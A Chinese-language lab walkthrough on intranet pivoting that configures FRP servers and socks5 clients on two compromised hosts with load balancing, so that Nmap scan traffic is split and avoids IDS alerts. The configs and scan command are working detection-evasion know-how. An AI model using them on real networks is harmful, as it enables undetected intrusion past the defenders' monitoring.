[内网渗透]FRP负载均衡

使用FRP,负载均衡,规避流量限制

一、实验环境

应用场景:内网有2台以上权限,需要对目标段发起大量扫描,如果单IP入站流量过大,会引起入侵检测系统(IDS)报警,此时可以使用FRP的负载均衡功能规避检测

tuopu

二、实验步骤

  1. VPS 上启动 Frps

    1
    Frps.exe -c frps.ini

    frps.ini 配置如下

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    [common]
    bind_addr = 0.0.0.0
    # 监听 7000 端口
    bind_port = 7000
    # 验证凭据,服务端和客户端的凭据⼀样
    auth_token = 123456789
    # 日志文件
    log_file = ./frps.log
    log_level = info
    log_max_days = 3
    # 允许端口
    allow_ports = 1080
    # 连接池上限
    max_pool_count = 50
    # 仪表盘端口、账密
    dashboard_port = 7500
    dashboard_user = admin
    dashboard_pwd = admin
  2. PC1 启动 Frpc1,连接 VPS [192.168.10.16(模拟公网)]

    1
    Frpc1.exe -c frpc1.ini

frpc1.ini 配置如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[common]
server_addr = 192.168.10.16
server_port = 7000
auth_token = 123456789
# 通信内容加密传输,防⽌流量被拦截
use_encryption = true
# 传输内容进⾏压缩,有效减⼩传输的⽹络流量,加快流量转发速度,但会额外消耗⼀些CPU资源
use_compression = true

[plugin_socks5_1]
type = tcp
remote_port = 1080
plugin = socks5
# 连接账密(可不带此参数)
plugin_user = abc
plugin_passwd = abc
# 负载均衡
group = web
group_key = 123
  1. PC2 启动 Frpc2,连接 VPS [192.168.10.16(模拟公网)]

    1
    Frpc2.exe -c frpc2.ini

frpc2.ini 配置如下

注意 区别在于 section 必须与 frpc2.ini 的 section 不相同,这里为 [plugin_socks5_2]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[common]
server_addr = 192.168.10.16
server_port = 7000
auth_token = 123456789
# 通信内容加密传输,防⽌流量被拦截
use_encryption = true
# 传输内容进⾏压缩,有效减⼩传输的⽹络流量,加快流量转发速度,但会额外消耗⼀些CPU资源
use_compression = true

[plugin_socks5_2]
type = tcp
remote_port = 1080
plugin = socks5
# 连接账密(可不带此参数)
plugin_user = abc
plugin_passwd = abc
# 负载均衡
group = web
group_key = 123

返回以下信息,说明连接成功

1
2
3
4
5
6
2020/11/07 22:33:13 [I] [service.go:288] [01608f2e6713a1e6] login to server succ
ess, get run id [01608f2e6713a1e6], server udp port [0]
2020/11/07 22:33:13 [I] [proxy_manager.go:144] [01608f2e6713a1e6] proxy added: [
plugin_socks5]
2020/11/07 22:33:13 [I] [control.go:180] [01608f2e6713a1e6] [plugin_socks5_1] star
t proxy success
  1. 在攻击机配置 Proxifier 的代理

    daili

  2. 使用 Nmap 扫描目标的 1-1024 端口

    1
    Nmap -Pn -sT -p 1-1024 -v 172.16.100.10

三、实验结果

在 VPS 打开仪表盘,可以看出流量被均分到了2个代理

1
2
# URL
http://127.0.0.1:7500 admin/admin